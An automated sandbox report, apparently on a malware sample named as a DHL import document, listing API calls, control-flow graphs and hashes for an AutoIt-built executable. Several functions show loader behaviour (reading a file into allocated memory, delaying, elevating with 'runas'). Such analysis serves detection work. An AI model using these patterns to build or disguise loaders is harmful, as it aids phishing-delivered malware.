                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135D3
                                                                                          • LockResource.KERNEL32(007D50AA,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20,?), ref: 008135E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                          • String ID: SCRIPT
                                                                                          • API String ID: 3051347437-3967369404
                                                                                          • Opcode ID: 97ffabeb1630b9181613d6d9df259090a7a7cddbb4eb57a86fda96ed7d337a91
                                                                                          • Instruction ID: bef02cb194056dce52f34f2dfcd0e0748e5fba99cfbd075ef469fe4f53613092
                                                                                          • Opcode Fuzzy Hash: 97ffabeb1630b9181613d6d9df259090a7a7cddbb4eb57a86fda96ed7d337a91
                                                                                          • Instruction Fuzzy Hash: 6F117C71200701BFEB218B65DC48F677BBAFBC5B51F15416AF856D6250DBB1E8008660
                                                                                          Function 00812BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B
                                                                                            • Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,00892224), ref: 00812C10
                                                                                          • ShellExecuteW.SHELL32(00000000,?,?,00892224), ref: 00812C17
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                          • String ID: runas
                                                                                          • API String ID: 448630720-4000483414
                                                                                          • Opcode ID: 3989401c2cbf49ec815de4a24346352857ee074ddd7920b49c4727990313925f
                                                                                          • Instruction ID: a3e9a67048c1167a3fe416750f60a72bd27be8ed1ac4a09940147de8f8a842d1
                                                                                          • Opcode Fuzzy Hash: 3989401c2cbf49ec815de4a24346352857ee074ddd7920b49c4727990313925f
                                                                                          • Instruction Fuzzy Hash: B711D231208241EADB04FF64D8599BEBBB5FFA5750F04142FF186823A3DF6C894A8712
                                                                                          Function 007DD730 Relevance: 21.6, APIs: 14, Instructions: 625sleeptimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep$InputStateTimetime
                                                                                          • String ID:
                                                                                          • API String ID: 2764417729-0
                                                                                          • Opcode ID: 4226c92d742368d48731f5478a61925aa64b53bee52c5e0d5d1aa8dbc62f51c4
                                                                                          • Instruction ID: e5af3c6081de3272032d17ff15709de394c4cd15f06e04fc3bff53909bb7b099
                                                                                          • Opcode Fuzzy Hash: 4226c92d742368d48731f5478a61925aa64b53bee52c5e0d5d1aa8dbc62f51c4
                                                                                          • Instruction Fuzzy Hash: 8A42F070608251EFDB35CF24C898B6ABBB0FF86314F14851AE49687391D779EC84CB92
                                                                                          Function 007D2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007D2D07
                                                                                          • RegisterClassExW.USER32(00000030), ref: 007D2D31
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
                                                                                          • LoadIconW.USER32(000000A9), ref: 007D2D85
                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                          • API String ID: 2914291525-1005189915
                                                                                          • Opcode ID: bc003ee842a47a78697939dfa2b669dfb962b3ae74b771a5e0d4b3ac121fa736
                                                                                          • Instruction ID: d4a68b541aa0f249e5bb4a1eb575c74fc08f1ca655e3e5e7d211e000c9652f04
                                                                                          • Opcode Fuzzy Hash: bc003ee842a47a78697939dfa2b669dfb962b3ae74b771a5e0d4b3ac121fa736
                                                                                          • Instruction Fuzzy Hash: 2F21E0B5901318AFEF00DFA8E889BEEBFB4FB09701F00911AF651A62A0D7B55544CF91
                                                                                          Function 0081065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 307 81065b-81068b call 81042f 310 8106a6-8106b2 call 805221 307->310 311 81068d-810698 call 7ff2c6 307->311 317 8106b4-8106c9 call 7ff2c6 call 7ff2d9 310->317 318 8106cb-810714 call 81039a 310->318 316 81069a-8106a1 call 7ff2d9 311->316 325 81097d-810983 316->325 317->316 327 810781-81078a GetFileType 318->327 328 810716-81071f 318->328 329 8107d3-8107d6 327->329 330 81078c-8107bd GetLastError call 7ff2a3 CloseHandle 327->330 332 810721-810725 328->332 333 810756-81077c GetLastError call 7ff2a3 328->333 337 8107d8-8107dd 329->337 338 8107df-8107e5 329->338 330->316 346 8107c3-8107ce call 7ff2d9 330->346 332->333 334 810727-810754 call 81039a 332->334 333->316 334->327 334->333 340 8107e9-810837 call 80516a 337->340 339 8107e7 338->339 338->340 339->340 349 810847-81086b call 81014d 340->349 350 810839-810845 call 8105ab 340->350 346->316 357 81086d 349->357 358 81087e-8108c1 349->358 350->349 356 81086f-810879 call 8086ae 350->356 356->325 357->356 360 8108c3-8108c7 358->360 361 8108e2-8108f0 358->361 360->361 362 8108c9-8108dd 360->362 363 8108f6-8108fa 361->363 364 81097b 361->364 362->361 363->364 366 8108fc-81092f CloseHandle call 81039a 363->366 364->325 369 810931-81095d GetLastError call 7ff2a3 call 805333 366->369 370 810963-810977 366->370 369->370 370->364
                                                                                          APIs
                                                                                            • Part of subcall function 0081039A: CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7
                                                                                          • GetLastError.KERNEL32 ref: 0081076F
                                                                                          • __dosmaperr.LIBCMT ref: 00810776
                                                                                          • GetFileType.KERNELBASE(00000000), ref: 00810782
                                                                                          • GetLastError.KERNEL32 ref: 0081078C
                                                                                          • __dosmaperr.LIBCMT ref: 00810795
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008107B5
                                                                                          • CloseHandle.KERNEL32(?), ref: 008108FF
                                                                                          • GetLastError.KERNEL32 ref: 00810931
                                                                                          • __dosmaperr.LIBCMT ref: 00810938
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175
                                                                                          • Opcode ID: fcdf90714a501250fa68fbd55047c319de87c3a1ca508b89dae1448b6fe487d1
                                                                                          • Instruction ID: e1031f20bc74ce7b642b721f376c465629e553111624e377c6a26bcdfca86f10
                                                                                          • Opcode Fuzzy Hash: fcdf90714a501250fa68fbd55047c319de87c3a1ca508b89dae1448b6fe487d1
                                                                                          • Instruction Fuzzy Hash: FAA1F032A041088FDF19AF68DC95BEE7BA4FF06324F140159E815EB3D2DA759892CF91
                                                                                          Function 007D344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78
                                                                                            • Part of subcall function 007D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007D3379
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D356A
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0081318D
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008131CE
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00813210
                                                                                          • _wcslen.LIBCMT ref: 00813277
                                                                                          • _wcslen.LIBCMT ref: 00813286
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                          • API String ID: 98802146-2727554177
                                                                                          • Opcode ID: 20cec4be2b3f7c9091eec2ea2739e7fc8532ec3eafa26cd84a4efb31f6abbb58
                                                                                          • Instruction ID: 8046b023401d41a2a6274205a98d62100ed52ed98f88ee7aa44ee3abb719426f
                                                                                          • Opcode Fuzzy Hash: 20cec4be2b3f7c9091eec2ea2739e7fc8532ec3eafa26cd84a4efb31f6abbb58
                                                                                          • Instruction Fuzzy Hash: 35715B71504301AED724EF69DC859ABBBF8FF86740B40442EF585C3670EB799A48CB62
                                                                                          Function 007D2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007D2B8E
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007D2B9D
                                                                                          • LoadIconW.USER32(00000063), ref: 007D2BB3
                                                                                          • LoadIconW.USER32(000000A4), ref: 007D2BC5
                                                                                          • LoadIconW.USER32(000000A2), ref: 007D2BD7
                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D2BEF
                                                                                          • RegisterClassExW.USER32(?), ref: 007D2C40
                                                                                            • Part of subcall function 007D2CD4: GetSysColorBrush.USER32(0000000F), ref: 007D2D07
                                                                                            • Part of subcall function 007D2CD4: RegisterClassExW.USER32(00000030), ref: 007D2D31
                                                                                            • Part of subcall function 007D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
                                                                                            • Part of subcall function 007D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
                                                                                            • Part of subcall function 007D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
                                                                                            • Part of subcall function 007D2CD4: LoadIconW.USER32(000000A9), ref: 007D2D85
                                                                                            • Part of subcall function 007D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                          • String ID: #$0$AutoIt v3
                                                                                          • API String ID: 423443420-4155596026
                                                                                          • Opcode ID: 4fe8ea59ef1b1f2e10dca2f14db1c6db6dc2c499b4b785b158da1ad3e4d8fad3
                                                                                          • Instruction ID: 5f8846bd94ecc5270a0153e081dfad5d2c8366eb406e3807554112e1989d0e0c
                                                                                          • Opcode Fuzzy Hash: 4fe8ea59ef1b1f2e10dca2f14db1c6db6dc2c499b4b785b158da1ad3e4d8fad3
                                                                                          • Instruction Fuzzy Hash: BD211A74E00318AFEF109FA9EC59BA97FF4FB49B50F04501AE504A6BA0D7B90540CF90
                                                                                          Function 007D3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 448 7d3170-7d3185 449 7d31e5-7d31e7 448->449 450 7d3187-7d318a 448->450 449->450 453 7d31e9 449->453 451 7d318c-7d3193 450->451 452 7d31eb 450->452 454 7d3199-7d319e 451->454 455 7d3265-7d326d PostQuitMessage 451->455 457 812dfb-812e23 call 7d18e2 call 7ee499 452->457 458 7d31f1-7d31f6 452->458 456 7d31d0-7d31d8 DefWindowProcW 453->456 460 7d31a4-7d31a8 454->460 461 812e7c-812e90 call 83bf30 454->461 463 7d3219-7d321b 455->463 462 7d31de-7d31e4 456->462 493 812e28-812e2f 457->493 464 7d321d-7d3244 SetTimer RegisterWindowMessageW 458->464 465 7d31f8-7d31fb 458->465 467 7d31ae-7d31b3 460->467 468 812e68-812e72 call 83c161 460->468 461->463 486 812e96 461->486 463->462 464->463 469 7d3246-7d3251 CreatePopupMenu 464->469 471 7d3201-7d3214 KillTimer call 7d30f2 call 7d3c50 465->471 472 812d9c-812d9f 465->472 476 7d31b9-7d31be 467->476 477 812e4d-812e54 467->477 482 812e77 468->482 469->463 471->463 479 812da1-812da5 472->479 480 812dd7-812df6 MoveWindow 472->480 484 7d31c4-7d31ca 476->484 485 7d3253-7d3263 call 7d326f 476->485 477->456 489 812e5a-812e63 call 830ad7 477->489 487 812da7-812daa 479->487 488 812dc6-812dd2 SetFocus 479->488 480->463 482->463 484->456 484->493 485->463 486->456 487->484 494 812db0-812dc1 call 7d18e2 487->494 488->463 489->456 493->456 497 812e35-812e48 call 7d30f2 call 7d3837 493->497 494->463 497->456
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,007D316A,?,?), ref: 007D31D8
                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,007D316A,?,?), ref: 007D3204
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D3227
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,007D316A,?,?), ref: 007D3232
                                                                                          • CreatePopupMenu.USER32 ref: 007D3246
                                                                                          • PostQuitMessage.USER32(00000000), ref: 007D3267
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                          • String ID: TaskbarCreated
                                                                                          • API String ID: 129472671-2362178303
                                                                                          • Opcode ID: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
                                                                                          • Instruction ID: 3da417bff3bfe66b0327c30a93be2ae3c7fe8c88c44258710ddf6793a041724e
                                                                                          • Opcode Fuzzy Hash: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
                                                                                          • Instruction Fuzzy Hash: AB41F935640609A7EF145FBCAC5DBBA3A79FB06340F080127F551C6BA1C7AE9A4097A3
                                                                                          Function 03ABC470 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 504 3abc470-3abc51e call 3ab9ea0 507 3abc525-3abc54b call 3abd380 CreateFileW 504->507 510 3abc54d 507->510 511 3abc552-3abc562 507->511 512 3abc69d-3abc6a1 510->512 519 3abc569-3abc583 VirtualAlloc 511->519 520 3abc564 511->520 513 3abc6e3-3abc6e6 512->513 514 3abc6a3-3abc6a7 512->514 516 3abc6e9-3abc6f0 513->516 517 3abc6a9-3abc6ac 514->517 518 3abc6b3-3abc6b7 514->518 521 3abc6f2-3abc6fd 516->521 522 3abc745-3abc75a 516->522 517->518 523 3abc6b9-3abc6c3 518->523 524 3abc6c7-3abc6cb 518->524 525 3abc58a-3abc5a1 ReadFile 519->525 526 3abc585 519->526 520->512 529 3abc6ff 521->529 530 3abc701-3abc70d 521->530 531 3abc76a-3abc772 522->531 532 3abc75c-3abc767 VirtualFree 522->532 523->524 533 3abc6db 524->533 534 3abc6cd-3abc6d7 524->534 527 3abc5a8-3abc5e8 VirtualAlloc 525->527 528 3abc5a3 525->528 526->512 535 3abc5ea 527->535 536 3abc5ef-3abc60a call 3abd5d0 527->536 528->512 529->522 537 3abc70f-3abc71f 530->537 538 3abc721-3abc72d 530->538 532->531 533->513 534->533 535->512 544 3abc615-3abc61f 536->544 540 3abc743 537->540 541 3abc73a-3abc740 538->541 542 3abc72f-3abc738 538->542 540->516 541->540 542->540 545 3abc652-3abc666 call 3abd3e0 544->545 546 3abc621-3abc650 call 3abd5d0 544->546 552 3abc66a-3abc66e 545->552 553 3abc668 545->553 546->544 554 3abc67a-3abc67e 552->554 555 3abc670-3abc674 CloseHandle 552->555 553->512 556 3abc68e-3abc697 554->556 557 3abc680-3abc68b VirtualFree 554->557 555->554 556->507 556->512 557->556
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03ABC541
                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03ABC767
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileFreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 204039940-0
                                                                                          • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                          • Instruction ID: f74e68cd00224bc18bc7382d2db3d39e2abdef503b23bcb9d7698ad6c4ac8d1f
                                                                                          • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                          • Instruction Fuzzy Hash: 8CA11874E00209EBDB14CFA4C994FEEBBB9BF48314F24915AE105BB281D7799A80CF54
                                                                                          Function 007D2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 568 7d2c63-7d2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D2C91
                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D2CB2
                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CC6
                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateShow
                                                                                          • String ID: AutoIt v3$edit
                                                                                          • API String ID: 1584632944-3779509399
                                                                                          • Opcode ID: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
                                                                                          • Instruction ID: 8cc876c0da265732181f19b20769dc22dcbf52a58d6cc632f7ba0e22ac90898a
                                                                                          • Opcode Fuzzy Hash: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
                                                                                          • Instruction Fuzzy Hash: DAF0DA765402A07AFF311B17AC0DE772EBDF7C7F60F01105AF900A2AA0C6A91850DBB0
                                                                                          Function 03ABC250 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 683 3abc250-3abc367 call 3ab9ea0 call 3abc140 CreateFileW 690 3abc369 683->690 691 3abc36e-3abc37e 683->691 692 3abc41e-3abc423 690->692 694 3abc380 691->694 695 3abc385-3abc39f VirtualAlloc 691->695 694->692 696 3abc3a3-3abc3ba ReadFile 695->696 697 3abc3a1 695->697 698 3abc3be-3abc3f8 call 3abc180 call 3abb140 696->698 699 3abc3bc 696->699 697->692 704 3abc3fa-3abc40f call 3abc1d0 698->704 705 3abc414-3abc41c ExitProcess 698->705 699->692 704->705 705->692
                                                                                          APIs
                                                                                            • Part of subcall function 03ABC140: Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03ABC35D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileSleep
                                                                                          • String ID: 9EJNKRNMDOM
                                                                                          • API String ID: 2694422964-3060855963
                                                                                          • Opcode ID: c7cbd2c79e430a49c9918f4b54aba69bcd8c24818bc31299113e96a44939f58b
                                                                                          • Instruction ID: 590abaef1125f84e12db487a415b088b26be1e40aa6b9ea9fe958c4ec841fcb5
                                                                                          • Opcode Fuzzy Hash: c7cbd2c79e430a49c9918f4b54aba69bcd8c24818bc31299113e96a44939f58b
                                                                                          • Instruction Fuzzy Hash: 23519F70D14249EBEB10DBA4C948BEEBB7DAF48310F0041A9E609BB2C1D7791B44CBA5
                                                                                          Function 007D3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
